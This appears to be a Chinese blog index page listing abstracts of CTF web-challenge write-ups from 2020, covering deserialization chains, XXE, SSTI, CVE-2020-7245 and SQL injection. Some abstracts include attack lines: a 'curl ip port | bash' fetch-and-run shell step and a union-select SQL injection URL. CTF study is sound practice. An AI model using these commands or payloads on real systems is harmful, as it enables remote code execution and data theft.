摘要: route 阅读全文
posted @ 2020-03-31 16:28 W4nder 阅读(598) 评论(0) 推荐(0) 编辑
摘要: 前言 一道typecho1.2的反序列化,顺便记录一下踩的坑 www.zip获得源码,结构大致如下 flag.php需要ssrf,如果成功会写入session 拿到源码直接去网上先找了一下有没有现成的payload(懒, 找到一篇类似的 "https://p0sec.net/index.php/ar 阅读全文
posted @ 2020-03-30 00:24 W4nder 阅读(627) 评论(0) 推荐(0) 编辑
摘要: fakegoogle SSTI old hack tp5.0.23 duangShell .index.php.swp泄漏 curl ip:port\ 或curl ip port | bash 简单注入 过滤了单引号、select、mid、and、=等常用字符,思路如下: 用\转义username的 阅读全文
posted @ 2020-03-23 16:50 W4nder 阅读(584) 评论(0) 推荐(0) 编辑
摘要: ad_js sql注入 数字型注入 common.inc.php sql注入 此文件在include下,应该是一些基础的函数或配置,所以任何包含此文件的都可以进行注入emmm 找到publish.php,正好包含了该文件 common.inc.php注入点: 可以看到如果没有进行登陆,并且只有$_C 阅读全文
posted @ 2020-03-20 00:56 W4nder 阅读(322) 评论(0) 推荐(0) 编辑
摘要: [GoogleCTF2019 Quals]Bnv 考点:本地DTD文件利用XXE漏洞 payload: 顺便贴一下无回显的xxe: [HarekazeCTF2019]Easy Notes 目标: 通读代码发现只有写note才能放到session中 然后export.php能将note的内容打包下载: 阅读全文
posted @ 2020-03-14 18:12 W4nder 阅读(2293) 评论(0) 推荐(0) 编辑
摘要: sqlcheckin sql注入 "https://blog.csdn.net/nzjdsds/article/details/82980041" 直接看例子: like也是一样 false false 得到true,令username:xxx'=',password:xxx'=',payload: 阅读全文
posted @ 2020-03-10 01:12 W4nder 阅读(638) 评论(2) 推荐(1) 编辑
摘要: HappyCTFd 考点: CVE 2020 7245 "https://www.colabug.com/2020/0204/6940556/" 利用方式: 注册一个如下账号,这里邮箱为buu上的内网邮箱系统 前往/reset_password找回密码 发送完成后把我们注册的用户名改一下: 然后用邮 阅读全文
posted @ 2020-03-01 15:57 W4nder 阅读(803) 评论(0) 推荐(0) 编辑
摘要: 安洵杯iamthinking tp6pop链 考点: 1.tp6.0反序列化链 2.parse_url()绕过 利用链: tp6.0与tp5.2的后半部分利用链一样,但是官方和composer都找不到tp5.2的源码了,将就着看一下吧 首先入口点是在think\Model::__destruct() 阅读全文
posted @ 2020-02-28 14:53 W4nder 阅读(381) 评论(0) 推荐(0) 编辑
摘要: 简单的招聘系统 无需注册账号,admin'or 1 登陆,到blank page页面,在输入key处发现有注入点: /pages blank.php?key=1%27+union+select+1%2C(select flaaag from flag)%2C3%2C4%2C5+%23 easysql 阅读全文
posted @ 2020-02-25 14:37 W4nder 阅读(201) 评论(0) 推荐(0) 编辑
摘要: 一些preg_replace的相关安全问题 阅读全文
posted @ 2020-02-25 14:36 W4nder 阅读(230) 评论(0) 推荐(0) 编辑